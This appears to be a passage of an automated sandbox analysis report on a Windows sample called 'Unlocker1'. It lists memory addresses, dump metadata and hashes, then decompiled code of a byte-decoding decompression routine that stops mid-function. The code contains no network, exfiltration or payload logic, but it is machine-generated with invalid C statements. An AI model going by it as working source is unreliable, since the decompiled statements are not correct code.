                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040624b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                                                              • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                                                                                                                                              • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                                                              • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00406365() {
                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                              				signed int _t532;
                                                                                                                                                              				void _t533;
                                                                                                                                                              				signed int _t534;
                                                                                                                                                              				signed int _t535;
                                                                                                                                                              				signed int _t565;
                                                                                                                                                              				signed int _t568;
                                                                                                                                                              				signed int _t589;
                                                                                                                                                              				signed int* _t606;
                                                                                                                                                              				void* _t613;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                              						 *(_t613 - 0x84) = 0xb;
                                                                                                                                                              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                                                              						goto L132;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eax =  *(__ebp - 0x28);
                                                                                                                                                              						L88:
                                                                                                                                                              						 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              						L89:
                                                                                                                                                              						__eax =  *(__ebp - 4);
                                                                                                                                                              						 *(__ebp - 0x80) = 0x15;
                                                                                                                                                              						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              						L69:
                                                                                                                                                              						 *(__ebp - 0x84) = 0x12;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L132:
                                                                                                                                                              							 *(_t613 - 0x54) = _t606;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L133:
                                                                                                                                                              								_t531 =  *_t606;
                                                                                                                                                              								_t589 = _t531 & 0x0000ffff;
                                                                                                                                                              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                              								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                              									 *(_t613 - 0x40) = 1;
                                                                                                                                                              									_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              									 *_t606 = _t532;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *(_t613 - 0x10) = _t565;
                                                                                                                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                              								}
                                                                                                                                                              								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                              									goto L139;
                                                                                                                                                              								}
                                                                                                                                                              								L137:
                                                                                                                                                              								if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              									 *(_t613 - 0x88) = 5;
                                                                                                                                                              									L170:
                                                                                                                                                              									_t568 = 0x22;
                                                                                                                                                              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                              									_t535 = 0;
                                                                                                                                                              									L172:
                                                                                                                                                              									return _t535;
                                                                                                                                                              								}
                                                                                                                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              								L139:
                                                                                                                                                              								_t533 =  *(_t613 - 0x84);
                                                                                                                                                              								while(1) {
                                                                                                                                                              									 *(_t613 - 0x88) = _t533;
                                                                                                                                                              									while(1) {
                                                                                                                                                              										L1:
                                                                                                                                                              										_t534 =  *(_t613 - 0x88);
                                                                                                                                                              										if(_t534 > 0x1c) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                                                              											case 0:
                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              												_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                              												if(_t534 > 0xe1) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												_t538 = _t534 & 0x000000ff;
                                                                                                                                                              												_push(0x2d);
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												_pop(_t570);
                                                                                                                                                              												_push(9);
                                                                                                                                                              												_pop(_t571);
                                                                                                                                                              												_t609 = _t538 / _t570;
                                                                                                                                                              												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                              												 *(_t613 - 0x3c) = _t604;
                                                                                                                                                              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                              												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                              													L10:
                                                                                                                                                              													if(_t612 == 0) {
                                                                                                                                                              														L12:
                                                                                                                                                              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              														goto L15;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L11;
                                                                                                                                                              													}
                                                                                                                                                              													do {
                                                                                                                                                              														L11:
                                                                                                                                                              														_t612 = _t612 - 1;
                                                                                                                                                              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                              													} while (_t612 != 0);
                                                                                                                                                              													goto L12;
                                                                                                                                                              												}
                                                                                                                                                              												if( *(_t613 - 4) != 0) {
                                                                                                                                                              													GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                              												}
                                                                                                                                                              												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              												 *(_t613 - 4) = _t534;
                                                                                                                                                              												if(_t534 == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                              													goto L10;
                                                                                                                                                              												}
                                                                                                                                                              											case 1:
                                                                                                                                                              												L13:
                                                                                                                                                              												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              													 *(_t613 - 0x88) = 1;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              												_t45 = _t613 - 0x48;
                                                                                                                                                              												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                              												__eflags =  *_t45;
                                                                                                                                                              												L15:
                                                                                                                                                              												if( *(_t613 - 0x48) < 4) {
                                                                                                                                                              													goto L13;
                                                                                                                                                              												}
                                                                                                                                                              												_t546 =  *(_t613 - 0x40);
                                                                                                                                                              												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                              													L20:
                                                                                                                                                              													 *(_t613 - 0x48) = 5;
                                                                                                                                                              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              													goto L23;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t613 - 0x74) = _t546;
                                                                                                                                                              												if( *(_t613 - 8) != 0) {
                                                                                                                                                              													GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                              												}
                                                                                                                                                              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                              												 *(_t613 - 8) = _t534;
                                                                                                                                                              												if(_t534 == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L20;
                                                                                                                                                              												}
                                                                                                                                                              											case 2:
                                                                                                                                                              												L24:
                                                                                                                                                              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                              												 *(_t613 - 0x84) = 6;
                                                                                                                                                              												 *(_t613 - 0x4c) = _t553;
                                                                                                                                                              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                              												L132:
                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                              												goto L133;
                                                                                                                                                              											case 3:
                                                                                                                                                              												L21:
                                                                                                                                                              												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              													 *(_t613 - 0x88) = 3;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              												_t67 = _t613 - 0x70;
                                                                                                                                                              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              												__eflags =  *_t67;
                                                                                                                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              												L23:
                                                                                                                                                              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                              												if( *(_t613 - 0x48) != 0) {
                                                                                                                                                              													goto L21;
                                                                                                                                                              												}
                                                                                                                                                              												goto L24;
                                                                                                                                                              											case 4:
                                                                                                                                                              												L133:
                                                                                                                                                              												_t531 =  *_t606;
                                                                                                                                                              												_t589 = _t531 & 0x0000ffff;
                                                                                                                                                              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                              												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                              													 *(_t613 - 0x40) = 1;
                                                                                                                                                              													_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              													 *_t606 = _t532;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(_t613 - 0x10) = _t565;
                                                                                                                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                              												}
                                                                                                                                                              												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L139;
                                                                                                                                                              												}
                                                                                                                                                              											case 5:
                                                                                                                                                              												goto L137;
                                                                                                                                                              											case 6:
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                              													 *(__ebp - 0x34) = 1;
                                                                                                                                                              													 *(__ebp - 0x84) = 7;
                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														L132:
                                                                                                                                                              														 *(_t613 - 0x54) = _t606;
                                                                                                                                                              														goto L133;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              												__esi =  *(__ebp - 0x60);
                                                                                                                                                              												__cl = 8;
                                                                                                                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              														_t98 = __ebp - 0x38;
                                                                                                                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              														__eflags =  *_t98;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              													}
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x38) = 0;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                              												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													__ebx = 1;
                                                                                                                                                              													goto L61;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              													}
                                                                                                                                                              													__ecx =  *(__ebp - 8);
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													__ebx = 1;
                                                                                                                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              													goto L41;
                                                                                                                                                              												}
                                                                                                                                                              											case 7:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                              												if( *(__ebp - 0x40) != 1) {
                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                              													 *(__ebp - 0x80) = 0x16;
                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              													__eax =  *(__ebp - 0x28);
                                                                                                                                                              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              													__eax = 0;
                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              													__al = __al & 0x000000fd;
                                                                                                                                                              													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                              													goto L69;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x84) = 8;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L132:
                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											case 8:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                              													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x38);
                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                              													 *(__ebp - 0x84) = 9;
                                                                                                                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                              												}
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L132:
                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											case 9:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													goto L89;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x60);
                                                                                                                                                              												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              												__eflags = _t259;
                                                                                                                                                              												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                              												goto L76;
                                                                                                                                                              											case 0xa:
                                                                                                                                                              												goto L0;
                                                                                                                                                              											case 0xb:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x24);
                                                                                                                                                              													__eax =  *(__ebp - 0x20);
                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x28);
                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              												goto L88;
                                                                                                                                                              											case 0xc:
                                                                                                                                                              												L99:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t334 = __ebp - 0x70;
                                                                                                                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t334;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												goto L101;
                                                                                                                                                              											case 0xd:
                                                                                                                                                              												L37:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t122 = __ebp - 0x70;
                                                                                                                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t122;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L39:
                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              													goto L48;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													goto L54;
                                                                                                                                                              												}
                                                                                                                                                              												L41:
                                                                                                                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              												 *(__ebp - 0x48) = __eax;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__eax = __eax << 8;
                                                                                                                                                              												__eax = __eax + __ebx;
                                                                                                                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edx = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													 *(__ebp - 0x40) = 1;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx + 1;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edx;
                                                                                                                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L39;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L37;
                                                                                                                                                              												}
                                                                                                                                                              											case 0xe:
                                                                                                                                                              												L46:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
